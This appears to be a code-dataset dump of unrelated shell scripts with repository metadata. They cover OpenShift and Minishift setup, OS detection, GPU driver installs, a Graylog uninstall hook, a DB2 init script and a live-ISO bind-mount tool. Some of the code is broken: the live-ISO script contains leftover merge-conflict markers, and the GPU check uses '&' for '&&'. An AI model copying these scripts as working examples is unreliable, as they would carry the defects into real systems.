# Voronoi mode (not tested)
#voronoi=true
#preserve-thermal-reliefs=true
# Drilling
$(
if [ -n "$DOUBLE_SIDED" ] ; then
cat <<EOF2
# Even for double sided board, we want to drill from the front side.
# It might be tempting to drill from the front and use the bit to drill
# alignment holes, but that would interfere with back side autolevelling in
# bCNC.
EOF2
fi
echo "drill-side=back"
)
zdrill=-1.75
drill-feed=120
drill-speed=10000
drills-available=0.8mm:-0.3mm:+0.1mm,1.0mm:-0.2mm:+0.2mm
zmilldrill=-1.60
milldrill-diameter=1.0
min-milldrill-hole-diameter=1.2 # TODO need 1.0 for 1mm slots
# outline (cut-) feeds and speeds are used
# Outline
cutter-diameter=1.0
zcut=-1.65
cut-feed=80
cut-vertfeed=30
cut-speed=10000
cut-infeed=0.8
cut-side=back
bridges=2mm
zbridges=-0.8mm
bridgesnum=2
EOF
| true
|
09982af7f7590e5b056113ddfa6fb1de694c0d2b
|
Shell
|
mannysah/how-to-run-minishift-locally-mac
|
/create-sample.sh
|
UTF-8
| 1,123
| 2.703125
| 3
|
[
"MIT"
] |
permissive
|
#Set the environment again
eval $(minishift oc-env)
eval $(minishift docker-env)
docker login -u $(oc whoami) -p $(oc whoami -t) $(minishift openshift registry)
#New NODE APP
oc new-app https://github.com/openshift/nodejs-ex -l name=nodejs-ex-app
oc expose svc/nodejs-ex
echo ""
echo "MINISHIFT REGISTRY IS:"
minishift openshift registry
#NEW SPRING BOOT APP
cd samples/sample-springboot/ && mvn clean package
docker build . -t $(minishift openshift registry)/dev-spring-project/springboot:dev
docker images | grep springboot
docker push $(minishift openshift registry)/dev-spring-project/springboot:dev
oc project dev-spring-project
oc new-app --image-stream=springboot:dev --name=springboot
oc expose service springboot
oc get pods
oc get routes
echo "Starting IT SETUP"
docker tag $(minishift openshift registry)/dev-spring-project/springboot:dev $(minishift openshift registry)/it-spring-project/springboot:it
docker push $(minishift openshift registry)/it-spring-project/springboot:it
oc project it-spring-project
oc new-app --image-stream=springboot:it --name=springboot
oc expose service springboot
| true
|
ca247118ab467e75ddd5b4bb4ab4d4d1a128c977
|
Shell
|
gchen88gh/SH-projects
|
/a.sh
|
UTF-8
| 258
| 2.59375
| 3
|
[] |
no_license
|
function curl()
{
#
echo "inside func - $0"
/usr/bin/curl $@
}
#
SERVER=srwp01abi001
/usr/bin/curl -s http://$SERVER.myweb.com/jmx-console/ | grep "$SERVER"
echo 'called by func curl'
curl -s http://$SERVER.myweb.com/jmx-console/ | grep "$SERVER"
| true
|
ae8af29faad70d90788e9920250af846cd263a94
|
Shell
|
kaneawk/oneinstack
|
/include/check_os.sh
|
UTF-8
| 4,796
| 3.28125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Author: yeho <lj2007331 AT gmail.com>
# BLOG: https://linuxeye.com
#
# Notes: OneinStack for CentOS/RedHat 7+ Debian 8+ and Ubuntu 16+
#
# Project home page:
# https://oneinstack.com
# https://github.com/oneinstack/oneinstack
if [ -e "/usr/bin/yum" ]; then
PM=yum
if [ -e /etc/yum.repos.d/CentOS-Base.repo ] && grep -Eqi "release 6." /etc/redhat-release; then
sed -i "s@centos/\$releasever@centos-vault/6.10@g" /etc/yum.repos.d/CentOS-Base.repo
sed -i 's@centos/RPM-GPG@centos-vault/RPM-GPG@g' /etc/yum.repos.d/CentOS-Base.repo
[ -e /etc/yum.repos.d/epel.repo ] && rm -f /etc/yum.repos.d/epel.repo
fi
if ! command -v lsb_release >/dev/null 2>&1; then
if [ -e "/etc/euleros-release" ]; then
yum -y install euleros-lsb
elif [ -e "/etc/openEuler-release" -o -e "/etc/openeuler-release" ]; then
yum -y install openeuler-lsb
else
yum -y install redhat-lsb-core
fi
clear
fi
fi
if [ -e "/usr/bin/apt-get" ]; then
PM=apt-get
command -v lsb_release >/dev/null 2>&1 || { apt-get -y update > /dev/null; apt-get -y install lsb-release; clear; }
fi
command -v lsb_release >/dev/null 2>&1 || { echo "${CFAILURE}${PM} source failed! ${CEND}"; kill -9 $$; exit 1; }
[ -e "/etc/anolis-release" ] && { command -v lsb_release >/dev/null 2>&1 || yum -y install system-lsb-core; }
# Get OS Version
OS=$(lsb_release -is)
ARCH=$(arch)
if [[ "${OS}" =~ ^CentOS$|^CentOSStream$|^RedHat$|^Rocky$|^AlmaLinux$|^Fedora$|^Amazon$|^AlibabaCloud$|^AlibabaCloud\(AliyunLinux\)$|^AnolisOS$|^EulerOS$|^openEuler$|^Oracle$ ]]; then
LikeOS=RHEL
RHEL_ver=$(lsb_release -rs | awk -F. '{print $1}' | awk '{print $1}')
[[ "${OS}" =~ ^Fedora$ ]] && [ ${RHEL_ver} -ge 19 >/dev/null 2>&1 ] && { RHEL_ver=7; Fedora_ver=$(lsb_release -rs); }
[[ "${OS}" =~ ^Amazon$|^EulerOS$|^openEuler$ ]] && RHEL_ver=7
[[ "${OS}" =~ ^openEuler$ ]] && [[ "${RHEL_ver}" =~ ^21$ ]] && RHEL_ver=8
[[ "${OS}" =~ ^AlibabaCloud$|^AlibabaCloud\(AliyunLinux\)$ ]] && [[ "${RHEL_ver}" =~ ^2$ ]] && RHEL_ver=7
[[ "${OS}" =~ ^AlibabaCloud$|^AlibabaCloud\(AliyunLinux\)$ ]] && [[ "${RHEL_ver}" =~ ^3$ ]] && RHEL_ver=8
elif [[ "${OS}" =~ ^Debian$|^Deepin$|^Uos$|^Kali$ ]]; then
LikeOS=Debian
Debian_ver=$(lsb_release -rs | awk -F. '{print $1}' | awk '{print $1}')
[[ "${OS}" =~ ^Deepin$|^Uos$ ]] && [[ "${Debian_ver}" =~ ^20$ ]] && Debian_ver=10
[[ "${OS}" =~ ^Kali$ ]] && [[ "${Debian_ver}" =~ ^202 ]] && Debian_ver=10
elif [[ "${OS}" =~ ^Ubuntu$|^LinuxMint$|^elementary$ ]]; then
LikeOS=Ubuntu
Ubuntu_ver=$(lsb_release -rs | awk -F. '{print $1}' | awk '{print $1}')
if [[ "${OS}" =~ ^LinuxMint$ ]]; then
[[ "${Ubuntu_ver}" =~ ^18$ ]] && Ubuntu_ver=16
[[ "${Ubuntu_ver}" =~ ^19$ ]] && Ubuntu_ver=18
[[ "${Ubuntu_ver}" =~ ^20$ ]] && Ubuntu_ver=20
fi
if [[ "${OS}" =~ ^elementary$ ]]; then
[[ "${Ubuntu_ver}" =~ ^5$ ]] && Ubuntu_ver=18
[[ "${Ubuntu_ver}" =~ ^6$ ]] && Ubuntu_ver=20
fi
fi
# Check OS Version
if [ ${RHEL_ver} -lt 7 >/dev/null 2>&1 ] || [ ${Debian_ver} -lt 8 >/dev/null 2>&1 ] || [ ${Ubuntu_ver} -lt 16 >/dev/null 2>&1 ]; then
echo "${CFAILURE}Does not support this OS, Please install CentOS 7+,Debian 8+,Ubuntu 16+ ${CEND}"
kill -9 $$; exit 1;
fi
command -v gcc > /dev/null 2>&1 || $PM -y install gcc
gcc_ver=$(gcc -dumpversion | awk -F. '{print $1}')
[ ${gcc_ver} -lt 5 >/dev/null 2>&1 ] && redis_ver=${redis_oldver}
if uname -m | grep -Eqi "arm|aarch64"; then
armplatform="y"
if uname -m | grep -Eqi "armv7"; then
TARGET_ARCH="armv7"
elif uname -m | grep -Eqi "armv8"; then
TARGET_ARCH="arm64"
elif uname -m | grep -Eqi "aarch64"; then
TARGET_ARCH="aarch64"
else
TARGET_ARCH="unknown"
fi
fi
if [ "$(uname -r | awk -F- '{print $3}' 2>/dev/null)" == "Microsoft" ]; then
Wsl=true
fi
if [ "$(getconf WORD_BIT)" == "32" ] && [ "$(getconf LONG_BIT)" == "64" ]; then
if [ "${TARGET_ARCH}" == 'aarch64' ]; then
SYS_ARCH=arm64
SYS_ARCH_i=aarch64
SYS_ARCH_n=arm64
else
SYS_ARCH=amd64 #openjdk
SYS_ARCH_i=x86-64 #ioncube
SYS_ARCH_n=x64 #nodejs
fi
else
echo "${CWARNING}32-bit OS are not supported! ${CEND}"
kill -9 $$; exit 1;
fi
THREAD=$(grep 'processor' /proc/cpuinfo | sort -u | wc -l)
# Percona binary: https://www.percona.com/doc/percona-server/5.7/installation.html#installing-percona-server-from-a-binary-tarball
if [ ${Debian_ver} -lt 9 >/dev/null 2>&1 ]; then
sslLibVer=ssl100
elif [ "${RHEL_ver}" == '7' ] && [ "${OS}" != 'Fedora' ]; then
sslLibVer=ssl101
elif [ ${Debian_ver} -ge 9 >/dev/null 2>&1 ] || [ ${Ubuntu_ver} -ge 16 >/dev/null 2>&1 ]; then
sslLibVer=ssl102
elif [ ${Fedora_ver} -ge 27 >/dev/null 2>&1 ]; then
sslLibVer=ssl102
elif [ "${RHEL_ver}" == '8' ]; then
sslLibVer=ssl1:111
else
sslLibVer=unknown
fi
| true
|
8b90281cc01d40a15f3a2016ee1b4d0784f6ab8f
|
Shell
|
cviorel/dotfiles-1
|
/scripts/arch/install_gpu_drivers.sh
|
UTF-8
| 435
| 3.21875
| 3
|
[
"Unlicense"
] |
permissive
|
#!/bin/sh
set -eu
gpu_vendor="$(get-gpu-vendor)"
if
[ "$gpu_vendor" = "nvidia" ] &
[ ! -f "/etc/X11/xorg.conf.d/20-nvidia.conf" ]
then
yay -S --noconfirm nvidia nvidia-settings >/dev/null
# generate an X11 config using NVIDIA's tool
sudo nvidia-xconfig --output-xconfig="/etc/X11/xorg.conf.d/20-nvidia.conf" >/dev/null
fi
if [ "$gpu_vendor" = "amd" ]; then
echo "TODO(#28): install AMD/ATI GPU drivers if detected"
fi
| true
|
d99dc657ff46749a57d46b5746a13260be299602
|
Shell
|
openshift/release
|
/ci-operator/step-registry/openshift-qe/router-perf/openshift-qe-router-perf-commands.sh
|
UTF-8
| 1,378
| 2.71875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -o errexit
set -o nounset
set -o pipefail
set -x
cat /etc/os-release
oc config view
oc projects
python --version
pushd /tmp
python -m virtualenv ./venv_qe
source ./venv_qe/bin/activate
ES_PASSWORD=$(cat "/secret/password")
ES_USERNAME=$(cat "/secret/username")
GSHEET_KEY_LOCATION="/ga-gsheet/gcp-sa-account"
export GSHEET_KEY_LOCATION
git clone https://github.com/cloud-bulldozer/e2e-benchmarking --depth=1
pushd e2e-benchmarking/workloads/router-perf-v2
# ES configuration
export ES_SERVER="https://$ES_USERNAME:$ES_PASSWORD@search-ocp-qe-perf-scale-test-elk-hcm7wtsqpxy7xogbu72bor4uve.us-east-1.es.amazonaws.com"
export ES_INDEX='router-test-results'
# Environment setup
export LARGE_SCALE_THRESHOLD='24'
export TERMINATIONS='mix'
export DEPLOYMENT_REPLICAS='1'
export SERVICE_TYPE='NodePort'
export NUMBER_OF_ROUTERS='2'
export HOST_NETWORK='true'
export NODE_SELECTOR='{node-role.kubernetes.io/worker: }'
# Benchmark configuration
export RUNTIME='60'
export SAMPLES='2'
export KEEPALIVE_REQUESTS='0 1 50'
export LARGE_SCALE_ROUTES='500'
export LARGE_SCALE_CLIENTS='1 80'
export LARGE_SCALE_CLIENTS_MIX='1 25'
export SMALL_SCALE_CLIENTS='1 400'
export SMALL_SCALE_CLIENTS_MIX='1 125'
export GEN_CSV='true'
export EMAIL_ID_FOR_RESULTS_SHEET='ocp-perfscale-qe@redhat.com'
rm -rf "${SHARED_DIR}/${OUTPUT_FILE:?}"
./ingress-performance.sh |& tee "${SHARED_DIR}/${OUTPUT_FILE}"
| true
|
32dab02db96d5cf9bd3f84dbbdb915bae121ce40
|
Shell
|
Amr344/fpm-recipes
|
/recipes/graylog-server/files/post-uninstall
|
UTF-8
| 846
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/sh
set -e
user="graylog"
group="graylog"
datadir="/var/lib/graylog-server"
logdir="/var/log/graylog-server"
remove_data="false"
case "$1" in
# DEB based systems
remove)
remove_data="false"
;;
purge)
remove_data="true"
;;
upgrade|failed-upgrade|abort-install|abort-upgrade|disappear)
# Nothing to do here
;;
# RPM based systems
0)
# Removal
remove_data="true"
;;
1)
# Upgrade
remove_data="false"
;;
*)
echo "[ERROR] post-uninstall script called with unknown argument: '$1'"
exit 1
;;
esac
if [ "$remove_data" = "true" ]; then
rm -rf "$datadir" "$logdir"
rm -f /etc/graylog/server/node-id
rm -f /etc/init/graylog-server.override
if id "$user" > /dev/null 2>&1 ; then
userdel "$user" || true
fi
if getent group "$group" > /dev/null 2>&1 ; then
groupdel "$group" || true
fi
fi
exit 0
| true
|
2d16baf9c72b7f5b9f725deffc9b53f31d40dbcc
|
Shell
|
input-output-hk/mailchimp-subscribe
|
/scripts/tag_release.sh
|
UTF-8
| 331
| 3.453125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
if [ "$CI" != "true" ]; then
echo ""
echo "Can only use the tag release script on CI"
echo ""
exit 1
fi
PACKAGE_VERSION=$(node ./scripts/getPackageVersion.js)
TAG_EXISTS=$(./scripts/tag_exists.sh v$PACKAGE_VERSION)
if [[ $TAG_EXISTS == "false" ]]; then
git tag v$PACKAGE_VERSION
git push origin --tags
fi
| true
|
febb7545f78408552c4f2532c039c6260764f3bf
|
Shell
|
nickivanov/db2_autostart_scripts
|
/db2_sles
|
UTF-8
| 3,326
| 3.984375
| 4
|
[
"Apache-2.0"
] |
permissive
|
#! /bin/sh
#
# /etc/init.d/db2
#
#
# System startup script for the DB2 instances.
# Will start/stop whatever instances are enabled to
# start at boot time in the DB2 global registry.
# See the DB2 Information Center for the db2greg
# utility for more details.
#
# This will probably only work on SuSE Linux
#
# To install:
# - copy the file to /etc/init.d
# - run chkconfig -add db2
#
#
# Copyright 2013 Nick Ivanov
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
### BEGIN INIT INFO
# Provides: db2
# Required-Start: $local_fs
# Required-Stop: $local_fs
# X-Start-Before: $network
# X-Stop-After: $network
# Default-Start: 3 5
# Default-Stop: 0 1 2 6
# Short-Description: DB2 instance processes
### END INIT INFO
. /etc/rc.status
# Shell functions sourced from /etc/rc.status:
# rc_check check and set local and overall rc status
# rc_status check and set local and overall rc status
# rc_status -v ditto but be verbose in local rc status
# rc_status -v -r ditto and clear the local rc status
# rc_failed set local and overall rc status to failed
# rc_reset clear local rc status (overall remains)
# rc_exit exit appropriate to overall rc status
# First reset status of this service
rc_reset
# DB2 installation path; only one if multiple versions installed
DB2_INSTALL_PATH=/opt/ibm/db2/V10.1
list_instances() {
$DB2_INSTALL_PATH/bin/db2greg -dump | grep -E '^I,DB2' | \
cut -d, --output-delimiter=" " -s -f4,5,7
}
case "$1" in
start)
echo "Starting DB2 instances "
# read DB2 instances from the global registry
list_instances | while read INST INSTDIR AUTOSTART
do
if [ $AUTOSTART -eq 1 ]
then
echo -n " $INST"
su - $INST -c $INSTDIR/adm/db2start>/dev/null& # send to background
rc_status -v
fi
done
;;
status)
echo "Checking for DB2 instances..."
## Check status with checkproc(8), if process is running
## checkproc will return with exit status 0.
# Status has a slightly different for the status command:
# 0 - service running
# 1 - service dead, but /var/run/ pid file exists
# 2 - service dead, but /var/lock/ lock file exists
# 3 - service not running
list_instances | while read INST INSTDIR AUTOSTART
do
echo -n " $INST"
checkproc $INSTDIR/adm/db2sysc
rc_status -v
done
;;
stop)
echo "Stopping DB2 instances..."
list_instances | while read INST INSTDIR AUTOSTART
do
checkproc $INSTDIR/adm/db2sysc
RC=$?
if [ $RC -eq 0 ]
then
echo -n " $INST"
su - $INST -c "$INSTDIR/adm/db2stop force">/dev/null # wait for it to stop
rc_status -v
fi
done
;;
*)
echo "Usage: $0 {start|stop|status}"
exit 1
;;
esac
rc_exit
| true
|
ee6e1dd907ead5514afb131f14e501ad66437de3
|
Shell
|
KubaHyzicki/scripts
|
/cb
|
UTF-8
| 696
| 3.65625
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
#_source
#WARNING: requires xdotool installed!!!
if [[ $1 == "--help" ]]
then #using xsel couse xclip is not working and this one requires a little more specific eval
echo "script copying input to clipboard
WARNING: requires xdotool installed!!!
to copy args type: cb \$arg1 \$arg2...
to copy file insides type: cb -f \$fileName"
return
fi
if [[ -z $1 ]]
then
echo "no args to cb"
return
fi
temp=~/Documents/cb_temp
comm='echo -n $@ > $temp'
if [[ (${1::1} == "-") && (`echo $1 | grep f`) ]]
then
dir=`pwd`
comm="cat $dir/$2 > $temp"
fi
if [[ true ]]
then
touch $temp
eval $comm
cd ~/Documents
xsel --clipboard < $temp
rm $temp
cd - > /dev/null
fi
| true
|
72788f8d49404d3435ddd4c3950a9ff6aac4ae15
|
Shell
|
zloyded/bash_files
|
/aliases/git_aliases.sh
|
UTF-8
| 100
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash
TAG=$1
MESSAGE=$2
alias pushtag="git tag -a $TAG -m '$MESSAGE' && git push origin $TAG"
| true
|
8ef58c883bdaa5ae9b080147f16ebd11cafe4822
|
Shell
|
antiX-Linux/Build-iso
|
/Tools/installed-to-live
|
UTF-8
| 30,046
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash
#
# Start:
# 1) Bind mount the bind-root
#
# General
# 2) do a bunch of bind mounts under bind-root
# (create directories and touch files as needed)
# 3) Munge files
#
# Add:
# 4) optionally do more bind mounts under ro-root
# (create directories and touch files as needed)
# Clean:
# 5) do a recursive umount
# 6) Delete touched files and created directories from the *original* FS
ME=${0##*/}
USER_PW=demo:demo
ROOT_PW=root:root
BIND_ROOT=/.bind-root
REAL_ROOT=/
WORK_DIR=/tmp/$ME
EXCLUDES_DIR=/usr/local/share/excludes
VERSION_FILE=/etc/live/version/linuxfs.ver
CONF_FILE=$WORK_DIR/cleanup.conf
TEMPLATE_DIR=/usr/local/share/live-files
DEF_TZ="America/New_York"
DEF_REPO="us"
PRETEND=
PW_FILES="/etc/passwd /etc/shadow /etc/gshadow /etc/group"
MUNGE_FILES="/etc/slim.conf /etc/lightdm/lightdm.conf"
BIND_FILES="$PW_FILES"
LIVE_FILE_LIST="
/etc/desktop-session/startup
/etc/fstab
/etc/grub.d/*
/etc/init.d/checkfs.sh
/etc/init.d/cron
/etc/init.d/debian/*
/etc/init.d/gpm
/etc/init.d/hwclock.sh
/etc/init.d/keyboard-setup.sh
/etc/init.d/console-setup.sh
/etc/init.d/sendsigs
/etc/init.d/umountfs
/etc/issue
/etc/rc.local
/etc/rc?.d/*virtualbox*
/etc/skel/.fluxbox/menu
/etc/skel/.icewm/menu
/etc/skel/.jwm/menu
/etc/skel/Desktop/Installer.desktop
/etc/udev/rules.d/90-fstab-automount.rules
/lib/udev/rules.d/92-console-font.rules
/usr/share/applications/mx/minstall.desktop
/usr/share/applications/antix/minstall.desktop
/usr/share/applications/antix/antixsources.desktop
/usr/share/applications/antix/persist-config.desktop
<<<<<<< HEAD
/usr/share/applications/antix/persist_setup.desktop
=======
/usr/share/applications/antix/persist_setup.desktop
>>>>>>> d2ef38609d7b6be5137959cd8a32c908772e1cf5
/usr/share/applications/antix/persist_save.desktop
/usr/share/applications/antix/remaster.desktop
"
GENERAL_LIVE_FILE_LIST="
/etc/adjtime
/etc/default/*
/etc/dhcp/dhclient.conf
/etc/dnsmasq.conf
/etc/hostname
/etc/init.d/ifplugd
/etc/init.d/networking
/etc/kbd/config
/etc/lightdm/lightdm.conf
/etc/modprobe.d/*
/etc/network/interfaces
/etc/network/interfaces.d/*
/etc/slim.conf
/lib/udev/ifupdown-hotplug
"
usage() {
local ret=${1:-0}
cat<<Usage
Usage: $ME [options] [commands ...]
Use bind mounts to create a filesystem that looks like the live system.
Create a config file $CONF_FILE that can be used to undo what we did.
This is needed because sometimes we create directories and touch files.
Commands:
start Do the main bind mount and create cleanup.conf
status Show status including contents of cleanup.conf
live-files bind mount files under $TEMPLATE_DIR/files
general-files bind mount files under $TEMPLATE_DIR/general-files
read-only Remount the bind root directory as read-only
read-write Remount the bind root directory as read-write
passwd Make general purpose password/group files
add=<dir1,dir2,..> Add files from the dirs template
bind=<dir1,dir2,..> Bind mount each dir IF it is a mountpoint
general Same as "empty=/etc/modprobe.d/ empty=/etc/grub.d
empty=/etc/network/interfaces.d/
all-files passwd repo timezone"
adjtime Reset the adjtime file but leave the utc / local selection
cleanup Clean up all that we did
repo[=<country>] Reset the apt repos to the country given (default us)
timezone=[<zone>] Reset the timezone back to EST or as specfied
empty=<dir1,dir2,...>
Bind mount empty directories at these locations
exclude[=<prefix>] file1 file2 ...
Generate an exclude list from the files listed. Prepend
each entry with <prefix> if it is given. (This is a
convenience routine for use with mksquashfs).
version-file[=<title>]
Create a standard linuxfs.ver file and bind mount it at
the appropriate location: $VERSION_FILE
populate-live-files <from-dir> [<to-dir>]
Populate the $TEMPLATE_DIR with files extracted from
<from-dir>. This is usually a mounted linuxfs file.
The optional <to-dir> is the top level directory under
which we will put the template directory.
Options:
-b --bind-root=<dir> The root of the new fs. Default: $BIND_ROOT
-e --excludes-dir=<dir> Directory for exclude files Default: $EXCLUDES_DIR
-f --from=<dir> Directory we copy from. Default: $REAL_ROOT
-F --Force Delete work directory when starting
-h --help Show this help
-o --output=<file> Send "exclude" command output to <file> instead of stdout
-P --pretend Don't do anything just show what would be done
-r --root=<user:password> The root user and optional password
-t --template=<dir> Template directory
-u --user=<user:password> Default username and optional password
-w --work=<dir> Temporary directory to hold our work: $WORK_DIR
-v --verbose Print more
Note: if passwords aren't given then the username is used as the password.
Current defaults:
--bind-root=$BIND_ROOT
--from=$REAL_ROOT
--template=$TEMPLATE_DIR
--user=$USER_PW
--root=$ROOT_PW
Usage
exit $ret
}
main() {
[ $# -eq 0 ] && usage
local param val
local short_stack="bdefFhoprtuv"
while [ $# -gt 0 -a -n "$1" -a -z "${1##-*}" ]; do
param=${1#-}
shift
# Unstack single-letter options
case $param in
[$short_stack][$short_stack]*)
if [ -z "${param//[$short_stack]/}" ]; then
set -- $(echo $param | sed -r 's/([a-zA-Z])/ -\1 /g') "$@"
continue
fi;;
esac
case $param in
-bind-root|-excludes-dir|-from|-output|-root|-template|-user|-work|[befortuw])
[ $# -lt 1 ] && fatal "Expected a parameter after: -$param"
val=$1
[ -n "$val" -a -z "${val##-*}" ] \
&& fatal "Suspicious parameter after -$param: $val"
shift ;;
*=*) val=${param#*=} ;;
*) val="???" ;;
esac
case $param in
-bind-root=*|b=*) BIND_ROOT=$val ;;
-bind-root|b) BIND_ROOT=$val ;;
-excludes-dir=*|e=*) EXCLUDES_DIR=$val ;;
-excludes-dir|e) EXCLUDES_DIR=$val ;;
-from=*|f=*) REAL_ROOT=$val ;;
-from|f) REAL_ROOT=$val ;;
-Force|F) FORCE=true ;;
-help|h) usage ;;
-output=*|o=*) OUTPUT_FILE=$val ;;
-output|o) OUTPUT_FILE=$val ;;
-pretend|p) PRETEND=true ;;
-root=*|r=*) ROOT_PW=$val ;;
-root|r) ROOT_PW=$val ;;
-template=*|t=*) TEMPLATE_DIR=$val ;;
-template|t) TEMPLATE_DIR=$val ;;
-user=*|u=*) USER_PW=$val ;;
-user|u) USER_PW=$val ;;
-verbose|v) VERBOSE=true ;;
-work=*|w=*) WORK_DIR=$val ;;
-work|w=) WORK_DIR=$val ;;
*) fatal "Unknown argument: -$param" ;;
esac
done
CONF_FILE=$WORK_DIR/cleanup.conf
[ $# -eq 0 ] && fatal "Expected as least one commmand"
while [ $# -gt 0 ]; do
local val cmd=$1
shift
val=${cmd#*=}
case $cmd in
start) do_start $CONF_FILE $WORK_DIR ;;
status) do_status $CONF_FILE ;;
add=*) do_add $CONF_FILE $WORK_DIR "$val" ;;
bind=*) do_bind $CONF_FILE $WORK_DIR "$val" ;;
live-files) do_live_files $CONF_FILE $WORK_DIR ;;
general-files) do_general_files $CONF_FILE $WORK_DIR ;;
general) do_general $CONF_FILE $WORK_DIR ;;
passwd) do_passwd $CONF_FILE ;;
read-only) do_read_only $CONF_FILE ;;
read-write) do_read_write $CONF_FILE ;;
cleanup) do_cleanup $CONF_FILE $WORK_DIR ;;
empty=*) do_empty $CONF_FILE $WORK_DIR "$val" ;;
version-file) do_version_file $CONF_FILE $WORK_DIR ;;
version-file=*) do_version_file $CONF_FILE $WORK_DIR "$val" ;;
adjtime) do_adjtime $CONF_FILE $WORK_DIR ;;
exclude=*) do_exclude "$val" "$@" ; exit 0 ;;
exclude) do_exclude "" "$@" ; exit 0 ;;
repo) do_repo $CONF_FILE $WORK_DIR "$DEF_REPO" ;;
repo=*) do_repo $CONF_FILE $WORK_DIR "$val" ;;
timezone) do_timezone $CONF_FILE $WORK_DIR "$DEF_TZ" ;;
timezone=*) do_timezone $CONF_FILE $WORK_DIR "$val" ;;
populate-live-files) do_populate_live "$@" ;;
*) fatal "Unexpected command: $cmd."
esac
done
}
do_populate_live() {
[ $# -lt 1 ] && fatal "Missing <from> directory"
local from_dir=$1 to_dir=$2
test -d "$from_dir" || fatal "$from is not a directory"
copy_files "$from_dir" "$LIVE_FILE_LIST" "$to_dir$TEMPLATE_DIR/files"
copy_files "$from_dir" "$GENERAL_LIVE_FILE_LIST" "$to_dir$TEMPLATE_DIR/general-files"
exit 0
}
copy_files() {
local from_dir=$1 files=$2 to_dir=$3
[ -z "$to_dir" -o -n "${to_dir##*[a-zA-Z]*}" ] && fatal "suspicious to-dir: $to_dir"
pretend rm -rf $to_dir
pretend mkdir -p $to_dir
local list=$(echo "$files" | grep -v "^\s*#\s*" | sed 's/\s*#.*//' \
| grep "^/" | sed "s=^=$from_dir=")
local file
for file in $list; do
test -e $file || continue
local dest_file=${file#$from_dir}
local dest=$to_dir$dest_file
local dest_dir=$(dirname $dest)
test -d $dest_dir || pretend mkdir -p $dest_dir
pretend cp -a $file $dest
done
}
do_version_file() {
local conf_file=$1 work_dir=$2 title=$3
read_conf_file $conf_file
local vdir=$work_dir/version-file
local vfile=$vdir$VERSION_FILE
mkdir -p $(dirname $vfile) || fatal "Could not make directory for version-file"
test -e $VERSION_FILE && cp $VERSION_FILE $vfile
cat >> $vfile << Version_Info
$(version_id)
title: $title
creation date: $(date +"%e %B %Y %T %Z")
kernel: $(uname -sr)
machine: $(uname -m)
Version_Info
bind_mount_template "$vdir" "$BIND_ROOT" "$REAL_ROOT"
}
do_exclude() {
local file ecnt=0 prefix=$1
shift
[ "$OUTPUT_FILE" ] && exec > $OUTPUT_FILE
for file; do
[ -z "${file##/*}" -o -z "${file##.*}" ] || file="$EXCLUDES_DIR/$file"
#echo "file: $file"
if ! test -f $file; then
error "Exclude file $file does not exist"
ecnt=$((ecnt + 1))
continue
fi
for line in $(grep -v "^\s*#" $file | sed -r -e "s=^\s*/?==" -e 's/\s+#.*//'); do
echo "$prefix$line"
done
done | sort -u
case $ecnt in
0) exit 0;;
1) fatal "One missing exclude file" ; exit 2 ;;
*) fatal "$ecnt missing exclude files" ; exit 2 ;;
esac
exit 3
}
do_start() {
local conf_file=$1 work_dir=$2
[ -z "$FORCE" -a -e "$work_dir" ] && fatal "Work dir $work_dir exists. Use --Force to delete it"
test -e $work_dir && rm -rf $work_dir
mkdir -p $BIND_ROOT || fatal "Could not make bind root directory $BIND_ROOT"
if is_mounted $BIND_ROOT &>/dev/null; then
[ -z "$FORCE" ] && fatal "bind-root: $BIND_ROOT is already a mount point"
else
mount --bind $REAL_ROOT $BIND_ROOT
fi
write_conf_file $conf_file
}
do_read_only() {
local conf_file=$1 work_dir=$2 dirs=$3
read_conf_file $conf_file
is_mounted $BIND_ROOT &>/dev/null || fatal "read-only: $BIND_ROOT is not mounted"
mount -o remount,bind,ro $BIND_ROOT
}
do_read_write() {
local conf_file=$1 work_dir=$2 dirs=$3
read_conf_file $conf_file
is_mounted $BIND_ROOT &>/dev/null || fatal "read-only: $BIND_ROOT is not mounted"
mount -o remount,bind,rw $BIND_ROOT
}
do_add() {
local conf_file=$1 work_dir=$2 dirs=$3
read_conf_file $conf_file
local dir real_dir real_root=${REAL_ROOT%/}
echo "$dirs" | tr ',' '\n' | while read dir; do
[ "$dir" ] || continue
real_dir=$real_root/${dir#/}
test -d $real_dir || fatal "Add dir: $real_dir is not a directory"
bind_mount_template "$dir" "$BIND_ROOT" "$REAL_ROOT"
done
write_conf_file $CONF_FILE
}
do_bind() {
local conf_file=$1 work_dir=$2 dirs=$3
read_conf_file $conf_file
local dir real_dir real_root=${REAL_ROOT%/}
echo "$dirs" | tr ',' '\n' | while read dir; do
dir=${dir#/}
[ "$dir" ] || continue
real_dir=$real_root/$dir
mountpoint -q $real_dir || continue
pretend mount --bind $real_dir $BIND_ROOT/$dir
done
write_conf_file $CONF_FILE
}
do_empty() {
local conf_file=$1 work_dir=$2 dirs=$3
read_conf_file $conf_file
bind_empty_dirs "$WORK_DIR/empty" "$BIND_ROOT" "$REAL_ROOT" "$dirs"
}
do_repo() {
local conf_file=$1 work_dir=$2 country=$3
read_conf_file $conf_file
real_dir="/etc/apt/sources.list.d"
repo_dir=$work_dir/repo
copy_dir=$repo_dir$real_dir
pretend mkdir -p $copy_dir
pretend cp $real_dir/*.list $copy_dir
pretend localize-repo --dir=$copy_dir $country
bind_mount_template "$repo_dir" "$BIND_ROOT" "$REAL_ROOT"
}
#------------------------------------------------------------------------------
#
#------------------------------------------------------------------------------
do_timezone() {
local conf_file=$1 work_dir=$2 tz=$3
read_conf_file $conf_file
local zone_file=$REAL_ROOT/usr/share/zoneinfo/$tz
local local_file=$REAL_ROOT/etc/localtime
local tz_file=$REAL_ROOT/etc/timezone
if ! test -e "$zone_file"; then
error "Invalid timezone: $tz"
return
fi
real_zone=$(readlink -f "$zone_file")
if ! test -f "$real_zone"; then
